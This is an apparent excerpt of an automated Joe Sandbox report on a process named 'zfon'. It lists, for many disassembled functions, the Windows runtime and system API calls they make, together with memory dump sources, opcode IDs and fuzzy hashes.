                                                                                                • Opcode Fuzzy Hash: f30811991d692bedc0c7a1c88b05bcfd0119dbfede1abc1abae9bd436faa4321
                                                                                                • Instruction Fuzzy Hash: E8219161B08BD282EA619F1EA40042AAAA4FF49FE4F544631DFBD17BA4DF3CD5429344
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::locale::_$Setgloballocalesetlocale$InitLocimpLocimp::_New__lock_locales
                                                                                                • String ID:
                                                                                                • API String ID: 2905786255-0
                                                                                                • Opcode ID: 7533d42a88b30cf4c54e14bc2d80b216ec68bb4ad39f55c3e1146a9e5df12688
                                                                                                • Instruction ID: 93f177f291331b4004769eb2a7216134128142725140f58ecc356d35f17baa9e
                                                                                                • Opcode Fuzzy Hash: 7533d42a88b30cf4c54e14bc2d80b216ec68bb4ad39f55c3e1146a9e5df12688
                                                                                                • Instruction Fuzzy Hash: 42318D26A08A8192EE549F1ED5942B96361FB84BE0F848531CF1E4B7A1DF3CE5569340
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25C3
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25D3
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25E3
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25F0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                • Opcode ID: 09fd9b7f2d28d969b82d29a789759c274fd24cd7d2748fe4802a739e8160af33
                                                                                                • Instruction ID: e659785401709e78e9cea6759029e1ffacad696a7d9925d0beb0aa5a422bc2d4
                                                                                                • Opcode Fuzzy Hash: 09fd9b7f2d28d969b82d29a789759c274fd24cd7d2748fe4802a739e8160af33
                                                                                                • Instruction Fuzzy Hash: CF21B17190874651FB14BF28EC68369B772EB497B4FA40234D67E02AECCF2DD4918664
                                                                                                APIs
                                                                                                • ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E6FF4
                                                                                                • ___lc_collate_cp_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E6FFE
                                                                                                  • Part of subcall function 00007FF8B90E9320: __strncnt.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF8B90E705B), ref: 00007FF8B90E9363
                                                                                                  • Part of subcall function 00007FF8B90E9320: __strncnt.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF8B90E705B), ref: 00007FF8B90E9388
                                                                                                  • Part of subcall function 00007FF8B90E9320: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF8B90E705B), ref: 00007FF8B90E93C8
                                                                                                • memcmp.VCRUNTIME140 ref: 00007FF8B90E7021
                                                                                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B90E705F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: __strncnt$Info___lc_collate_cp_func___lc_locale_name_func_errnomemcmp
                                                                                                • String ID:
                                                                                                • API String ID: 3421985146-0
                                                                                                • Opcode ID: 02edfa4313c4fb3aabff1bebf8c1357e348f0fccc221029525811e02a34b2029
                                                                                                • Instruction ID: 3e062b0f938097e7611f279c711073427e46ac4def2887e3b90af0ce5f0fc022
                                                                                                • Opcode Fuzzy Hash: 02edfa4313c4fb3aabff1bebf8c1357e348f0fccc221029525811e02a34b2029
                                                                                                • Instruction Fuzzy Hash: 99216231A08B82C6EF149F2EA440169B7A4FB84FE0B544135DB5D577A5DF3CE8429700
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E6623
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E6633
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E6643
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E6650
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                • Opcode ID: b95c016416db0c7f8fb3c8f7d6a9f229c93ff0f0e18789e355680685c849e604
                                                                                                • Instruction ID: cb664ae734f6ea9a322e3dd18e24e12e83b44a29869dae3f43d4aa385410c67f
                                                                                                • Opcode Fuzzy Hash: b95c016416db0c7f8fb3c8f7d6a9f229c93ff0f0e18789e355680685c849e604
                                                                                                • Instruction Fuzzy Hash: AE110421E1864651EB14BF28FC58339A371EB497F0F901730D67E02AEDCE2DD0904665
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3041573648-0
                                                                                                • Opcode ID: 7d4bbb70432d916687639b929200fd9207a111d92069894b91313117c6e492f1
                                                                                                • Instruction ID: 3bfe151be3ed241964f34d96bd4e3d482aeebb32c2384909a214f1bfd52628bf
                                                                                                • Opcode Fuzzy Hash: 7d4bbb70432d916687639b929200fd9207a111d92069894b91313117c6e492f1
                                                                                                • Instruction Fuzzy Hash: 3E215022A0CB4185DB95AF11BC40169B7B0FB8CBD4F484534FA9E437AADF3CD54587A0
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E34D0
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E34E0
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E34F0
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E34FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                • Opcode ID: 92a2097852ec47728736fe8942dbd70fe199a2d08fb94bba399e5a4b162ee94b
                                                                                                • Instruction ID: 3fe7a3176a5ded70c7c710ac386a1010da269f14b5e2eabd091176217a2d530c
                                                                                                • Opcode Fuzzy Hash: 92a2097852ec47728736fe8942dbd70fe199a2d08fb94bba399e5a4b162ee94b
                                                                                                • Instruction Fuzzy Hash: FC11462160874681EF18BF69EC0C739A272EB05BA5FD41530C67D037D9CF6ED58186B9
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3041573648-0
                                                                                                • Opcode ID: 7197ee378ef0cece509e4b77bb64e0ce9f980a1e7a92a43fd744432bfccf45b7
                                                                                                • Instruction ID: 1ab09760f38317db0c63861273379e1616e34a1cef2e68ce99dc241f308c5ea1
                                                                                                • Opcode Fuzzy Hash: 7197ee378ef0cece509e4b77bb64e0ce9f980a1e7a92a43fd744432bfccf45b7
                                                                                                • Instruction Fuzzy Hash: 64210666A04B8093E758CF3AE6406A9B370F799B94F00A125DF9E53A16DF38F1E4C700
                                                                                                APIs
                                                                                                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF7F9702D11), ref: 00007FF7F970B4F7
                                                                                                  • Part of subcall function 00007FF7F97098A0: memmove.VCRUNTIME140 ref: 00007FF7F9709939
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F970B52C
                                                                                                • SetLastError.KERNEL32 ref: 00007FF7F970B555
                                                                                                • ?_Ios_base_dtor@ios_base@std@@CAXPEAV12@@Z.MSVCP140 ref: 00007FF7F970B58A
                                                                                                  • Part of subcall function 00007FF7F9709270: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F9702D11), ref: 00007FF7F970927A
                                                                                                  • Part of subcall function 00007FF7F9709270: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F9702D11), ref: 00007FF7F970928F
                                                                                                  • Part of subcall function 00007FF7F9709270: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F9702D11), ref: 00007FF7F970929F
                                                                                                  • Part of subcall function 00007FF7F9709270: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F9702D11), ref: 00007FF7F97092AF
                                                                                                  • Part of subcall function 00007FF7F9709270: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F9702D11), ref: 00007FF7F97092BC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$V01@$??6?$basic_ostream@D@std@@@std@@ErrorIos_base_dtor@ios_base@std@@LastU?$char_traits@V01@@V12@@cef_string_map_allocmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 1591153422-0
                                                                                                • Opcode ID: e478e4a49091e4febd9e88758899345e0d7ad71bdfea3095cc3ece45b93430a1
                                                                                                • Instruction ID: 51b1fc0b5586799e9bbb17eee5164a2cfabcd3eb8b6ebdcea035cd4f43669e06
                                                                                                • Opcode Fuzzy Hash: e478e4a49091e4febd9e88758899345e0d7ad71bdfea3095cc3ece45b93430a1
                                                                                                • Instruction Fuzzy Hash: 7411FF31618B8685EB54EF25E8552A9B330FB88B88F800132DA6D076A9DF3CD544C7A0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_func
                                                                                                • String ID:
                                                                                                • API String ID: 3203701943-0
                                                                                                • Opcode ID: 39f0dbf7affc20ace0cd8a52b7416ca02a5e873dcbaf1932feb67f8f83f8ece6
                                                                                                • Instruction ID: 49cf648c102cbd511ea384bbab6fbb1c3f2c951d1a8beccf706c4e955a6c810f
                                                                                                • Opcode Fuzzy Hash: 39f0dbf7affc20ace0cd8a52b7416ca02a5e873dcbaf1932feb67f8f83f8ece6
                                                                                                • Instruction Fuzzy Hash: B9019EE2F08AD582EF156F2ED404468AAB1FF58BD0B08D435DA1D8B619DE7CD0858710
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549530455.00007FF8BFAD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8BFAD0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549435771.00007FF8BFAD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549570951.00007FF8BFAD5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549677238.00007FF8BFAD8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549715751.00007FF8BFAD9000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfad0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                • String ID:
                                                                                                • API String ID: 2933794660-0
                                                                                                • Opcode ID: 97e3b286ae614011fb11402c562bf5637a4e2633fea006b985175adf9c6b4b30
                                                                                                • Instruction ID: f6dbb5832f1011814f00b86da7c129979d71be3ae6780425f32000f46482c0ea
                                                                                                • Opcode Fuzzy Hash: 97e3b286ae614011fb11402c562bf5637a4e2633fea006b985175adf9c6b4b30
                                                                                                • Instruction Fuzzy Hash: 1D112126B14F018AEB10CFA8E8552B833A4FB19798F442D31DB5D467D4DF7CD1548340
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E2876
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E2886
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E2896
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E28A3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                • Opcode ID: d01dba25007abe557549af685efbd49781723a6d9761e89bdcf780ad220a84d7
                                                                                                • Instruction ID: ea81030f5a1b33a754f6291362768095dfb3d63eea7bd24abb51d1e8276d2fe2
                                                                                                • Opcode Fuzzy Hash: d01dba25007abe557549af685efbd49781723a6d9761e89bdcf780ad220a84d7
                                                                                                • Instruction Fuzzy Hash: 5C017161E0460A90EB0CFF64E85C3396372DB04B99F900834C66E026DDCF6D94D982F6
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                • String ID:
                                                                                                • API String ID: 2933794660-0
                                                                                                • Opcode ID: d0d271f438ed08dbae623c384d3e10f076376a6d5000b6ec581f085f3f477592
                                                                                                • Instruction ID: 753495510d96ac2ff7ea0595b7f1d5a874efde4146ef52fbeb962679a3e9d035
                                                                                                • Opcode Fuzzy Hash: d0d271f438ed08dbae623c384d3e10f076376a6d5000b6ec581f085f3f477592
                                                                                                • Instruction Fuzzy Hash: B8111C22B18B019AEB408BA4E8543A873A4FB19798F440E31DB6D467A4DF7CD1688340
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                • String ID:
                                                                                                • API String ID: 2933794660-0
                                                                                                • Opcode ID: 76dfa9f6affd35542d897482e00a8f8d8a31374749d9766d0099c6e1fca2c63d
                                                                                                • Instruction ID: 3626931d7f6e565459858ff1df8e0fa2c3084ac798613d164ccf603d6da1ef45
                                                                                                • Opcode Fuzzy Hash: 76dfa9f6affd35542d897482e00a8f8d8a31374749d9766d0099c6e1fca2c63d
                                                                                                • Instruction Fuzzy Hash: 2C113C22A48F819AEB10DF65E8552A833A4FB1D798F041A31EB5D47794DF3CD1A8C340
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
